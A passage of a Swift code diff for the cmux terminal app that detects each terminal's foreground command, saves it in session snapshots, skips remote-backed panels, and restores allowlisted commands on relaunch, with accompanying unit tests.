+        os_unfair_lock_lock(&unfairLock)
+        defer { os_unfair_lock_unlock(&unfairLock) }
+        return cache[normalizedTTY]
+    }
+
+    #if DEBUG
+    /// Test-only seam: replace the cache contents directly, bypassing process detection.
+    /// Lets unit tests exercise the snapshot's remote-skip branch without spawning `ps`.
+    func _testReplaceCache(_ entries: [String: String]) {
+        let normalized = Dictionary(uniqueKeysWithValues: entries.map {
+            (Self.normalizeTTYName($0.key), $0.value)
+        })
+        os_unfair_lock_lock(&unfairLock)
+        cache = normalized
+        os_unfair_lock_unlock(&unfairLock)
+    }
+    #endif
+
+    /// Normalize TTY name for consistent cache keying (strips /dev/ prefix)
+    private static func normalizeTTYName(_ ttyName: String) -> String {
+        let trimmed = ttyName.trimmingCharacters(in: .whitespacesAndNewlines)
+        if trimmed.hasPrefix("/dev/") {
+            return String(trimmed.dropFirst(5))
+        }
+        return trimmed
+    }
+}
+
+// MARK: - Foreground Process Detection
+
+enum SessionForegroundProcessDetector {
+    private static let psPath = "/bin/ps"
+
+    struct ForegroundProcess {
+        let pid: Int32
+        let executableName: String
+        let commandLine: String?
+    }
+
+    /// Detect the foreground process running in a TTY.
+    /// Returns nil if no foreground process or only shell is running.
+    static func detect(forTTY ttyName: String) -> ForegroundProcess? {
+        let normalizedTTY = normalizeTTYName(ttyName)
+        guard !normalizedTTY.isEmpty else { return nil }
+
+        let processes = processSnapshots(forTTY: normalizedTTY)
+        guard let foreground = processes.first(where: { isForegroundProcess($0, ttyName: normalizedTTY) }) else {
+            return nil
+        }
+
+        // Skip if foreground is just a shell
+        let shellNames = [
+            "zsh", "bash", "sh", "fish", "tcsh", "ksh", "dash",  // POSIX-ish shells
+            "csh",                                               // C shell
+            "pwsh", "powershell",                                // PowerShell
+            "nu", "nushell",                                     // Nushell
+            "elvish", "xonsh", "oil", "osh",                     // Alternative shells
+            "rc", "es",                                          // Plan 9 shells
+        ]
+        if shellNames.contains(foreground.executableName) {
+            return nil
+        }
+
+        let commandLine = commandLineString(forPID: foreground.pid)
+
+        return ForegroundProcess(
+            pid: foreground.pid,
+            executableName: foreground.executableName,
+            commandLine: commandLine
+        )
+    }
+
+    private struct ProcessSnapshot {
+        let pid: Int32
+        let pgid: Int32
+        let tpgid: Int32
+        let tty: String
+        let executableName: String
+    }
+
+    private static func normalizeTTYName(_ ttyName: String) -> String {
+        let trimmed = ttyName.trimmingCharacters(in: .whitespacesAndNewlines)
+        if trimmed.hasPrefix("/dev/") {
+            return String(trimmed.dropFirst(5))
+        }
+        return trimmed
+    }
+
+    private static func isForegroundProcess(_ process: ProcessSnapshot, ttyName: String) -> Bool {
+        normalizeTTYName(process.tty) == normalizeTTYName(ttyName) &&
+            process.tpgid > 0 &&
+            process.pgid == process.tpgid
+    }
+
+    private static func processSnapshots(forTTY ttyName: String) -> [ProcessSnapshot] {
+        let process = Process()
+        let pipe = Pipe()
+        process.executableURL = URL(fileURLWithPath: psPath)
+        process.arguments = ["-ww", "-t", ttyName, "-o", "pid=,pgid=,tpgid=,tty=,ucomm="]
+        process.standardInput = FileHandle.nullDevice
+        process.standardOutput = pipe
+        process.standardError = FileHandle.nullDevice
+
+        do {
+            try process.run()
+        } catch {
+            return []
+        }
+
+        // Drain stdout off-thread so ps cannot deadlock on a full pipe buffer.
+        // ps output for one TTY is far under the OS pipe buffer in practice, but
+        // the synchronous read-then-wait pattern would hang waitUntilExit if it
+        // ever grew, so we drain concurrently.
+        let outputBox = ProcessOutputBox()
+        let readSemaphore = DispatchSemaphore(value: 0)
+        DispatchQueue.global(qos: .utility).async {
+            defer { readSemaphore.signal() }
+            outputBox.data = pipe.fileHandleForReading.readDataToEndOfFile()
+        }
+        process.waitUntilExit()
+        readSemaphore.wait()
+
+        guard process.terminationStatus == 0,
+              let output = String(data: outputBox.data, encoding: .utf8) else {
+            return []
+        }
+
+        return output
+            .split(separator: "\n")
+            .compactMap(parseProcessSnapshot)
+    }
+
+    private final class ProcessOutputBox: @unchecked Sendable {
+        var data = Data()
+    }
+
+    private static func parseProcessSnapshot(_ line: Substring) -> ProcessSnapshot? {
+        let parts = line.split(maxSplits: 4, whereSeparator: \.isWhitespace)
+        guard parts.count == 5,
+              let pid = Int32(parts[0]),
+              let pgid = Int32(parts[1]),
+              let tpgid = Int32(parts[2]) else {
+            return nil
+        }
+
+        return ProcessSnapshot(
+            pid: pid,
+            pgid: pgid,
+            tpgid: tpgid,
+            tty: String(parts[3]),
+            executableName: String(parts[4]).trimmingCharacters(in: .whitespacesAndNewlines).lowercased()
+        )
+    }
+
+    private static func commandLineString(forPID pid: Int32) -> String? {
+        var mib = [CTL_KERN, KERN_PROCARGS2, pid]
+        var size: size_t = 0
+        guard sysctl(&mib, u_int(mib.count), nil, &size, nil, 0) == 0, size > 4 else {
+            return nil
+        }
+
+        var buffer = [UInt8](repeating: 0, count: size)
+        let success = buffer.withUnsafeMutableBytes { rawBuffer in
+            sysctl(&mib, u_int(mib.count), rawBuffer.baseAddress, &size, nil, 0) == 0
+        }
+        guard success else { return nil }
+
+        // KERN_PROCARGS2 layout: argc (4 bytes), exec path, null-terminated argv strings
+        let argc = buffer.withUnsafeBytes { $0.loadUnaligned(as: Int32.self) }
+        guard argc > 0 else { return nil }
+
+        // Skip argc and find first null (end of exec path)
+        var offset = 4
+        while offset < buffer.count && buffer[offset] != 0 {
+            offset += 1
+        }
+        // Skip nulls between exec path and argv[0]
+        while offset < buffer.count && buffer[offset] == 0 {
+            offset += 1
+        }
+
+        // Extract argv strings by finding null-separated byte runs and decoding as UTF-8
+        // IMPORTANT: Count ALL arguments including empty strings to avoid scanning past argv
+        // into environment variables. An empty argv entry (two consecutive nulls) must still
+        // be counted toward argc.
+        // If any argument fails UTF-8 decoding, abort entirely to avoid restoring a
+        // materially different command (e.g., "tool <bad-bytes> --flag" → "tool --flag").
+        var args: [String] = []
+        var argCount = 0
+        var start = offset
+        for i in offset...buffer.count {
+            let byte: UInt8 = i < buffer.count ? buffer[i] : 0
+            if byte == 0 {
+                // Always count this as an argument, even if empty
+                argCount += 1
+                if i > start {
+                    let slice = Array(buffer[start..<i])
+                    guard let s = String(bytes: slice, encoding: .utf8) else {
+                        // Abort on first UTF-8 decode failure
+                        return nil
+                    }
+                    args.append(s)
+                }
+                // Empty strings (i == start) are counted but not added to args
+                if argCount >= Int(argc) { break }
+                start = i + 1
+            }
+        }
+
+        guard !args.isEmpty else { return nil }
+
+        // Keep full path to preserve exact executable location (e.g., /opt/mycompany/tool)
+        // Shell-quote arguments that contain spaces, quotes, or special chars
+        let quotedArgs = args.map { shellQuoteIfNeeded($0) }
+        return quotedArgs.joined(separator: " ")
+    }
+
+    /// Shell-quote a string if it contains spaces, quotes, or shell metacharacters.
+    /// Uses single quotes with escaped single quotes for safety.
+    private static func shellQuoteIfNeeded(_ s: String) -> String {
+        // Characters that require quoting in shell
+        let needsQuoting = s.contains { c in
+            c.isWhitespace || c == "'" || c == "\"" || c == "\\" ||
+            c == "$" || c == "`" || c == "!" || c == "*" || c == "?" ||
+            c == "[" || c == "]" || c == "(" || c == ")" || c == "{" ||
+            c == "}" || c == "<" || c == ">" || c == "|" || c == "&" ||
+            c == ";" || c == "#" || c == "~"
+        }
+        guard needsQuoting else { return s }
+        // Use single quotes, escaping any embedded single quotes as '\''
+        let escaped = s.replacingOccurrences(of: "'", with: "'\\''")
+        return "'\(escaped)'"
     }
 }

--- a/Sources/TabManager.swift
+++ b/Sources/TabManager.swift
@@ -7211,6 +7211,11 @@ extension TabManager {
         return hasher.finalize()
     }
 
+    /// Returns all TTY names across all workspaces for cache refresh.
+    func allTerminalTTYNames() -> [String] {
+        tabs.flatMap { $0.allTerminalTTYNames() }
+    }
+
     nonisolated static func restorableAgentSnapshotFingerprint(
         _ snapshot: SessionRestorableAgentSnapshot?
     ) -> Int {

--- a/Sources/Workspace.swift
+++ b/Sources/Workspace.swift
@@ -160,6 +160,19 @@ extension Workspace {
         )
     }
 
+    private func isRemoteBackedForSessionSnapshot(_ panelId: UUID) -> Bool {
+        isRemoteTerminalSurface(panelId) ||
+        transferredRemoteCleanupConfigurationsByPanelId[panelId] != nil ||
+        pendingRemoteTerminalChildExitSurfaceIds.contains(panelId)
+    }
+
+    func allTerminalTTYNames() -> [String] {
+        panels.compactMap { panelId, panel in
+            guard panel is TerminalPanel, !isRemoteBackedForSessionSnapshot(panelId) else { return nil }
+            return surfaceTTYNames[panelId]
+        }
+    }
+
     func sessionSnapshot(
         includeScrollback: Bool,
         restorableAgentIndex: RestorableAgentSessionIndex? = nil
@@ -399,12 +412,9 @@ extension Workspace {
         let branchSnapshot = panelGitBranches[panelId].map {
             SessionGitBranchSnapshot(branch: $0.branch, isDirty: $0.isDirty)
         }
-        let listeningPorts: [Int]
-        if remoteDetectedSurfaceIds.contains(panelId) || isRemoteTerminalSurface(panelId) {
-            listeningPorts = []
-        } else {
-            listeningPorts = (surfaceListeningPorts[panelId] ?? []).sorted()
-        }
+        let isRemoteBackedTerminal = isRemoteBackedForSessionSnapshot(panelId)
+        let hasRemoteDetectedPorts = remoteDetectedSurfaceIds.contains(panelId)
+        let listeningPorts = (isRemoteBackedTerminal || hasRemoteDetectedPorts) ? [] : (surfaceListeningPorts[panelId] ?? []).sorted()
         let ttyName = surfaceTTYNames[panelId]
 
         let terminalSnapshot: SessionTerminalPanelSnapshot?
@@ -442,9 +452,15 @@ extension Workspace {
                 includeScrollback: includeScrollback,
                 allowFallbackScrollback: shouldPersistScrollback || allowDebugFallbackScrollback
             )
+            let detectedCommand: String? = {
+                guard !isRemoteBackedTerminal, let ttyName else { return nil }
+                return SessionForegroundProcessCache.shared.cachedCommandLine(forTTY: ttyName)
+            }()
             terminalSnapshot = SessionTerminalPanelSnapshot(
                 workingDirectory: directory,
                 scrollback: resolvedScrollback,
+                detectedCommand: detectedCommand,
+                isRemoteBacked: isRemoteBackedTerminal,
                 agent: effectiveRestorableAgent,
                 tmuxStartCommand: restorableTmuxStartCommand
             )
@@ -737,7 +753,11 @@ extension Workspace {
                 tmuxStartCommand: restoredTmuxStartCommand
             )
             let autoResumeAgentSessions = AgentSessionAutoResumeSettings.isEnabled()
-            let restoredAgentResumeInput = autoResumeAgentSessions
+            let panelWasRemoteBacked = snapshot.terminal?.isRemoteBacked ?? false
+            // Drop agent resume input when:
+            // 1. User disabled auto-resume in settings
+            // 2. Panel was remote-backed at snapshot time (resume command targets the wrong shell)
+            let restoredAgentResumeInput: String? = (autoResumeAgentSessions && !panelWasRemoteBacked)
                 ? restorableAgent?.resumeStartupInput()
                 : nil
 #if DEBUG
@@ -757,13 +777,28 @@ extension Workspace {
             let replayEnvironment = SessionScrollbackReplayStore.replayEnvironment(
                 for: shouldReplayScrollback ? snapshot.terminal?.scrollback : nil
             )
+            let commandToRestore: String? = {
+                guard SessionRestoreCommandSettings.isEnabled(), !panelWasRemoteBacked else { return nil }
+                return SessionRestoreCommandSettings.validatedRestoreCommand(snapshot.terminal?.detectedCommand)
+            }()
+            // Precedence: a restorable agent (Claude Code/Codex) resume takes priority over
+            // an auto-detected foreground command. If neither applies, we pass nil and the
+            // shell starts normally. `restoredAgentResumeInput` is already newline-terminated;
+            // `commandToRestore` is a bare command (TerminalSurface will append the newline).
+            let combinedInitialInput: String? = restoredAgentResumeInput ?? commandToRestore
+            // The per-panel `panelWasRemoteBacked` gate above already nilled
+            // `combinedInitialInput` for remote-backed panels. For panels saved as local
+            // inside a workspace that is currently remote-configured, opt out of
+            // `newTerminalSurface`'s default drop so the restored input is honored.
+            let allowInitialInputDespiteRemote = !panelWasRemoteBacked && combinedInitialInput != nil
             guard let terminalPanel = newTerminalSurface(
                 inPane: paneId,
                 focus: false,
                 workingDirectory: workingDirectory,
                 initialCommand: restoredTmuxStartupScript?.path,
                 tmuxStartCommand: restoredTmuxStartCommand,
-                initialInput: restoredAgentResumeInput,
+                initialInput: combinedInitialInput,
+                allowInitialInputWithRemoteStartupCommand: allowInitialInputDespiteRemote,
                 startupEnvironment: replayEnvironment
             ) else {
                 return nil
@@ -852,14 +887,9 @@ extension Workspace {
             panelGitBranches.removeValue(forKey: panelId)
         }
 
-        surfaceListeningPorts[panelId] = Array(Set(snapshot.listeningPorts)).sorted()
-
-        if let ttyName = snapshot.ttyName?.trimmingCharacters(in: .whitespacesAndNewlines), !ttyName.isEmpty {
-            surfaceTTYNames[panelId] = ttyName
-        } else {
-            surfaceTTYNames.removeValue(forKey: panelId)
-        }
-        syncRemotePortScanTTYs()
+        let isRemoteBackedTerminal = snapshot.terminal?.isRemoteBacked ?? false
+        surfaceListeningPorts[panelId] = isRemoteBackedTerminal ? [] : Array(Set(snapshot.listeningPorts)).sorted()
+        // Don't restore ttyName - stale from dead session; new terminal reports its own TTY
 
         if let browserSnapshot = snapshot.browser,
            let browserPanel = browserPanel(for: panelId) {
@@ -9263,6 +9293,9 @@ final class Workspace: Identifiable, ObservableObject {
             panel is TerminalPanel ? panelId : nil
         }
         guard terminalIds.count == 1, let initialPanelId = terminalIds.first else { return }
+        // Clear stale local metadata - this existing terminal is being upgraded to remote
+        surfaceTTYNames.removeValue(forKey: initialPanelId)
+        surfaceListeningPorts.removeValue(forKey: initialPanelId)
         trackRemoteTerminalSurface(initialPanelId)
     }
 
@@ -10016,6 +10049,7 @@ final class Workspace: Identifiable, ObservableObject {
         initialCommand: String? = nil,
         tmuxStartCommand: String? = nil,
         initialInput: String? = nil,
+        allowInitialInputWithRemoteStartupCommand: Bool = false,
         startupEnvironment: [String: String] = [:]
     ) -> TerminalPanel? {
         let shouldFocusNewTab = focus ?? (bonsplitController.focusedPaneId == paneId)
@@ -10035,6 +10069,17 @@ final class Workspace: Identifiable, ObservableObject {
             template.waitAfterCommand = true
             inheritedConfig = template
         }
+        let safeInitialInput: String?
+        if remoteTerminalStartupCommand != nil && !allowInitialInputWithRemoteStartupCommand {
+            #if DEBUG
+            if let dropped = initialInput, !dropped.isEmpty {
+                cmuxDebugLog("surface.create dropping initialInput due to remoteTerminalStartupCommand bytes=\(dropped.count)")
+            }
+            #endif
+            safeInitialInput = nil
+        } else {
+            safeInitialInput = initialInput
+        }
 
         // Create new terminal panel
         let newPanel = TerminalPanel(
@@ -10045,7 +10090,7 @@ final class Workspace: Identifiable, ObservableObject {
             portOrdinal: portOrdinal,
             initialCommand: startupCommand,
             tmuxStartCommand: tmuxStartCommand,
-            initialInput: initialInput,
+            initialInput: safeInitialInput,
             additionalEnvironment: startupEnvironment
         )
         configureTerminalPanel(newPanel)

--- a/Sources/Workspace.swift
+++ b/Sources/Workspace.swift
@@ -10041,6 +10041,12 @@ final class Workspace: Identifiable, ObservableObject {
     /// - Parameter focus: nil = focus only if the target pane is already focused (default UI behavior),
     ///                    true = force focus/selection of the new surface,
     ///                    false = never focus (used for internal placeholder repair paths).
+    /// - Parameter allowInitialInputWithRemoteStartupCommand: When true, `initialInput` is
+    ///   honored even if the workspace currently has a `remoteTerminalStartupCommand()`. The
+    ///   default (false) drops `initialInput` in that case as defense against accidentally
+    ///   typing local commands into a remote shell. The session-restore path opts in for
+    ///   panels saved as local (`!panelWasRemoteBacked`), since the per-panel snapshot has
+    ///   already established that `initialInput` is intended for this terminal.
     @discardableResult
     func newTerminalSurface(
         inPane paneId: PaneID,

--- a/cmuxTests/SessionPersistenceTests.swift
+++ b/cmuxTests/SessionPersistenceTests.swift
@@ -133,6 +133,135 @@ final class SessionPersistenceTests: XCTestCase {
     }
 
     @MainActor
+    func testSessionSnapshotPreservesDetectedCommandForLocalTerminal() throws {
+        // Positive control for testSessionSnapshotSkipsDetectedCommandForRemoteTerminal:
+        // proves the suppression is gated on remote-backed status, not a global drop that
+        // would mask a regression in detectedCommand persistence for normal local panels.
+        let workspace = Workspace()
+        let panelId = try XCTUnwrap(workspace.focusedPanelId)
+
+        SessionForegroundProcessCache.shared._testReplaceCache(["/dev/ttys001": "opencode"])
+        defer { SessionForegroundProcessCache.shared._testReplaceCache([:]) }
+
+        workspace.surfaceTTYNames[panelId] = "/dev/ttys001"
+
+        let snapshot = workspace.sessionSnapshot(includeScrollback: false)
+        let panelSnapshot = try XCTUnwrap(snapshot.panels.first { $0.id == panelId })
+
+        XCTAssertEqual(
+            panelSnapshot.terminal?.detectedCommand,
+            "opencode",
+            "local panel must preserve detectedCommand from foreground cache so the remote-skip case stays meaningful"
+        )
+        XCTAssertEqual(panelSnapshot.terminal?.isRemoteBacked, false)
+    }
+
+    @MainActor
+    func testRestoreRemoteBackedSnapshotSuppressesBothAutoRestoreSources() throws {
+        // End-to-end restore-time gate: a remote-backed snapshot with both an agent
+        // resume command and an allowlisted detectedCommand must restore with NO
+        // initialInput. Without the per-panel `panelWasRemoteBacked` gate in
+        // Workspace.createPanel(from:inPane:), one or both would silently get typed
+        // into the freshly-restored shell.
+        let source = Workspace()
+        let sourcePanelId = try XCTUnwrap(source.focusedPanelId)
+        let configuration = WorkspaceRemoteConfiguration(
+            destination: "cmux-macmini",
+            port: nil,
+            identityFile: nil,
+            sshOptions: [],
+            localProxyPort: nil,
+            relayPort: 64001,
+            relayID: "relay-test",
+            relayToken: String(repeating: "c", count: 64),
+            localSocketPath: "/tmp/cmux-test.sock",
+            terminalStartupCommand: "ssh cmux-macmini"
+        )
+
+        SessionForegroundProcessCache.shared._testReplaceCache(["/dev/ttys001": "opencode"])
+        defer { SessionForegroundProcessCache.shared._testReplaceCache([:]) }
+
+        source.configureRemoteConnection(configuration, autoConnect: false)
+        source.surfaceTTYNames[sourcePanelId] = "/dev/ttys001"
+
+        let agentIndex = try makeRestorableAgentIndex(
+            workspaceId: source.id,
+            panelId: sourcePanelId,
+            sessionId: "codex-remote-restore-session",
+            arguments: ["/usr/local/bin/codex", "--model", "gpt-5.4"]
+        )
+        let snapshot = source.sessionSnapshot(includeScrollback: false, restorableAgentIndex: agentIndex)
+
+        let restored = Workspace()
+        restored.restoreSessionSnapshot(snapshot)
+        let restoredPanelId = try XCTUnwrap(restored.focusedPanelId)
+        let restoredPanel = try XCTUnwrap(restored.terminalPanel(for: restoredPanelId))
+
+        XCTAssertNil(
+            restoredPanel.surface.initialInput,
+            "remote-backed restore must suppress both agent resume input and detectedCommand"
+        )
+    }
+
+    @MainActor
+    func testRestoreLocalPanelInsideRemoteWorkspacePreservesInitialInput() throws {
+        // Regression test for CodeRabbit's MAJOR finding on PR #3237: a panel saved as
+        // local (panelWasRemoteBacked=false) inside a workspace whose remote config has
+        // been re-established before restore must NOT have its agent resume input
+        // silently dropped by `Workspace.newTerminalSurface`'s remote-startup guard.
+        //
+        // Real-world scenario: user opens local terminal -> runs opencode -> later
+        // configures the workspace as SSH -> quits cmux -> on relaunch, the app
+        // re-establishes the remote configuration BEFORE replaying the snapshot.
+        //
+        // Without the `allowInitialInputWithRemoteStartupCommand` opt-out plumbed in
+        // `createPanel(from:inPane:)`, `safeInitialInput` would unconditionally nil
+        // the agent resume command and the user would lose their resumable session.
+        let source = Workspace()
+        let sourcePanelId = try XCTUnwrap(source.focusedPanelId)
+        let agentIndex = try makeRestorableAgentIndex(
+            kind: .codex,
+            workspaceId: source.id,
+            panelId: sourcePanelId,
+            sessionId: "codex-local-in-remote-session",
+            arguments: ["/usr/local/bin/codex", "--model", "gpt-5.4"]
+        )
+        // Snapshot is taken while workspace is local, so panel.isRemoteBacked == false
+        // and the snapshot carries the agent resume command.
+        let snapshot = source.sessionSnapshot(includeScrollback: false, restorableAgentIndex: agentIndex)
+
+        // Restore into a workspace that has had its remote configuration re-established
+        // first (mirrors AppDelegate's restore order).
+        let restored = Workspace()
+        let configuration = WorkspaceRemoteConfiguration(
+            destination: "cmux-macmini",
+            port: nil,
+            identityFile: nil,
+            sshOptions: [],
+            localProxyPort: nil,
+            relayPort: 64001,
+            relayID: "relay-test",
+            relayToken: String(repeating: "c", count: 64),
+            localSocketPath: "/tmp/cmux-test.sock",
+            terminalStartupCommand: "ssh cmux-macmini"
+        )
+        restored.configureRemoteConnection(configuration, autoConnect: false)
+        restored.restoreSessionSnapshot(snapshot)
+
+        let restoredPanelId = try XCTUnwrap(restored.focusedPanelId)
+        let restoredPanel = try XCTUnwrap(restored.terminalPanel(for: restoredPanelId))
+
+        XCTAssertNotNil(
+            restoredPanel.surface.initialInput,
+            "local-in-remote panel must preserve agent resume input on restore (regression for #3237 review)"
+        )
+        XCTAssertTrue(
+            restoredPanel.surface.initialInput?.contains("codex") == true,
+            "preserved input must be the agent resume command, not stale state"
+        )
+    }
+
+    @MainActor
     func testAllTerminalTTYNamesExcludesRemoteTerminals() throws {
         let workspace = Workspace()
         let panelId = try XCTUnwrap(workspace.focusedPanelId)

--- a/cmuxTests/SessionPersistenceTests.swift
+++ b/cmuxTests/SessionPersistenceTests.swift
@@ -72,6 +72,100 @@ final class SessionPersistenceTests: XCTestCase {
         XCTAssertTrue(panelSnapshot.listeningPorts.isEmpty)
     }
 
+    @MainActor
+    func testSessionSnapshotSetsIsRemoteBackedForRemoteTerminal() throws {
+        let workspace = Workspace()
+        let panelId = try XCTUnwrap(workspace.focusedPanelId)
+        let configuration = WorkspaceRemoteConfiguration(
+            destination: "cmux-macmini",
+            port: nil,
+            identityFile: nil,
+            sshOptions: [],
+            localProxyPort: nil,
+            relayPort: 64001,
+            relayID: "relay-test",
+            relayToken: String(repeating: "c", count: 64),
+            localSocketPath: "/tmp/cmux-test.sock",
+            terminalStartupCommand: "ssh cmux-macmini"
+        )
+
+        workspace.configureRemoteConnection(configuration, autoConnect: false)
+
+        let snapshot = workspace.sessionSnapshot(includeScrollback: false)
+        let panelSnapshot = try XCTUnwrap(snapshot.panels.first { $0.id == panelId })
+
+        XCTAssertEqual(panelSnapshot.terminal?.isRemoteBacked, true)
+    }
+
+    @MainActor
+    func testSessionSnapshotSkipsDetectedCommandForRemoteTerminal() throws {
+        let workspace = Workspace()
+        let panelId = try XCTUnwrap(workspace.focusedPanelId)
+        let configuration = WorkspaceRemoteConfiguration(
+            destination: "cmux-macmini",
+            port: nil,
+            identityFile: nil,
+            sshOptions: [],
+            localProxyPort: nil,
+            relayPort: 64001,
+            relayID: "relay-test",
+            relayToken: String(repeating: "c", count: 64),
+            localSocketPath: "/tmp/cmux-test.sock",
+            terminalStartupCommand: "ssh cmux-macmini"
+        )
+
+        // Seed the foreground cache so this test actually exercises the
+        // remote-skip branch in sessionPanelSnapshot. Without seeding, the
+        // assertion would pass vacuously even if the guard was deleted.
+        SessionForegroundProcessCache.shared._testReplaceCache(["/dev/ttys001": "opencode"])
+        defer { SessionForegroundProcessCache.shared._testReplaceCache([:]) }
+
+        workspace.configureRemoteConnection(configuration, autoConnect: false)
+        workspace.surfaceTTYNames[panelId] = "/dev/ttys001"
+
+        let snapshot = workspace.sessionSnapshot(includeScrollback: false)
+        let panelSnapshot = try XCTUnwrap(snapshot.panels.first { $0.id == panelId })
+
+        XCTAssertNil(
+            panelSnapshot.terminal?.detectedCommand,
+            "remote-backed panel must drop detectedCommand even when the foreground cache has a value for its TTY"
+        )
+    }
+
+    @MainActor
+    func testAllTerminalTTYNamesExcludesRemoteTerminals() throws {
+        let workspace = Workspace()
+        let panelId = try XCTUnwrap(workspace.focusedPanelId)
+
+        workspace.surfaceTTYNames[panelId] = "/dev/ttys001"
+        XCTAssertEqual(workspace.allTerminalTTYNames(), ["/dev/ttys001"])
+
+        let configuration = WorkspaceRemoteConfiguration(
+            destination: "cmux-macmini",
+            port: nil,
+            identityFile: nil,
+            sshOptions: [],
+            localProxyPort: nil,
+            relayPort: 64001,
+            relayID: "relay-test",
+            relayToken: String(repeating: "c", count: 64),
+            localSocketPath: "/tmp/cmux-test.sock",
+            terminalStartupCommand: "ssh cmux-macmini"
+        )
+
+        workspace.configureRemoteConnection(configuration, autoConnect: false)
+
+        // configureRemoteConnection clears surfaceTTYNames during promotion;
+        // re-seed so the assertion proves the helper FILTERS the remote panel
+        // rather than just observing an empty dictionary.
+        workspace.surfaceTTYNames[panelId] = "/dev/ttys001"
+
+        XCTAssertTrue(
+            workspace.allTerminalTTYNames().isEmpty,
+            "panel is remote-backed; allTerminalTTYNames should filter it even when surfaceTTYNames has an entry"
+        )
+    }
+
     func testSaveAndLoadRoundTripWithCustomSnapshotPath() throws {
         let tempDir = FileManager.default.temporaryDirectory
             .appendingPathComponent("cmux-session-tests-\(UUID().uuidString)", isDirectory: true)
@@ -2161,5 +2255,1300 @@ final class SidebarDragFailsafePolicyTests: XCTestCase {
                 forMouseEventType: .leftMouseDragged
             )
         )
+    }
+}
+
+// MARK: - Session Restore Command Settings Tests
+
+final class SessionRestoreCommandSettingsTests: XCTestCase {
+    // MARK: - Enabled Toggle Tests
+
+    func testDisabledSettingBlocksAllCommands() {
+        let defaults = UserDefaults(suiteName: "SessionRestoreCommandSettingsTests")!
+        defaults.removePersistentDomain(forName: "SessionRestoreCommandSettingsTests")
+
+        // Explicitly disable restore commands
+        defaults.set(false, forKey: SessionRestoreCommandSettings.enabledKey)
+
+        // Even allowlisted commands should be blocked when disabled
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode", defaults: defaults))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("npm run dev", defaults: defaults))
+    }
+
+    func testEnabledByDefaultWhenKeyNotSet() {
+        let defaults = UserDefaults(suiteName: "SessionRestoreCommandSettingsTests")!
+        defaults.removePersistentDomain(forName: "SessionRestoreCommandSettingsTests")
+
+        // Key not set should default to enabled (allowing allowlisted commands)
+        // Use explicit allowlist to avoid coupling to shipped defaults
+        defaults.set("testcmd *", forKey: SessionRestoreCommandSettings.allowlistKey)
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("testcmd --flag", defaults: defaults))
+    }
+
+    func testExplicitlyEnabledAllowsCommands() {
+        let defaults = UserDefaults(suiteName: "SessionRestoreCommandSettingsTests")!
+        defaults.removePersistentDomain(forName: "SessionRestoreCommandSettingsTests")
+
+        // Explicitly enable restore commands
+        defaults.set(true, forKey: SessionRestoreCommandSettings.enabledKey)
+        // Use explicit allowlist to avoid coupling to shipped defaults
+        defaults.set("testcmd *", forKey: SessionRestoreCommandSettings.allowlistKey)
+
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("testcmd --flag", defaults: defaults))
+    }
+
+    // MARK: - Pattern Matching Tests
+
+    func testExactMatchPatternMatchesOnlyExactCommand() {
+        let allowlist = "opencode"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode --flag", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode-other", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("my-opencode", rawAllowlist: allowlist))
+    }
+
+    func testPrefixPatternMatchesCommandWithAndWithoutArgs() {
+        let allowlist = "opencode *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode --flag", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode -c --model sonnet", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode-other", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("my-opencode", rawAllowlist: allowlist))
+    }
+
+    func testMultiplePatternsInAllowlist() {
+        let allowlist = """
+        opencode
+        opencode *
+        claude *
+        npm run dev
+        """
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode --continue", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("claude --model sonnet", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("npm run dev", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("npm run build", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("yarn dev", rawAllowlist: allowlist))
+    }
+
+    func testCommentsAndBlankLinesAreIgnored() {
+        let allowlist = """
+        # This is a comment
+        opencode
+
+        # Another comment
+        claude *
+        """
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("claude --flag", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("# This is a comment", rawAllowlist: allowlist))
+    }
+
+    func testWhitespaceTrimmingInCommands() {
+        let allowlist = "opencode *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("  opencode --flag  ", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("\topencode\t", rawAllowlist: allowlist))
+    }
+
+    func testEmptyCommandIsNotAllowed() {
+        let allowlist = "opencode *"
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("   ", rawAllowlist: allowlist))
+    }
+
+    // MARK: - Allowlist Wildcard Pattern Edge Cases
+
+    func testPrefixPatternMatchesAbsolutePathCommands() {
+        // Pattern "opencode *" should match "/usr/bin/opencode --flag" via basename extraction
+        let allowlist = "opencode *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("/usr/bin/opencode", rawAllowlist: allowlist))
